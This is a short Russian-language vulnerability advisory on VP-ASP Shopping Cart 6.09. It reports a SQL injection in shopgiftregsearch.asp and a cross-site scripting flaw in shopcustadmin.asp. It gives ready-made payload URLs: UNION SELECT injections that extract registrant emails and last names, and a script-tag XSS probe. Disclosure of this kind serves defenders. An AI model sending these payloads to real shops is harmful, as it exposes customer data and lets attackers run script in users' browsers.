Хакер #305. Многошаговые SQL-инъекции
Программа: VP-ASP Shopping Cart 6.09
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "LoginLastname" сценарием shopgiftregsearch.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0%20from%20registrant%20where%20'1=1
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0%20from%20registrant%20where%20'1=1
Уязвимость существует из-за недостаточной обработки входных данных в параметре "msg" сценарием shopcustadmin.asp. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
//shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E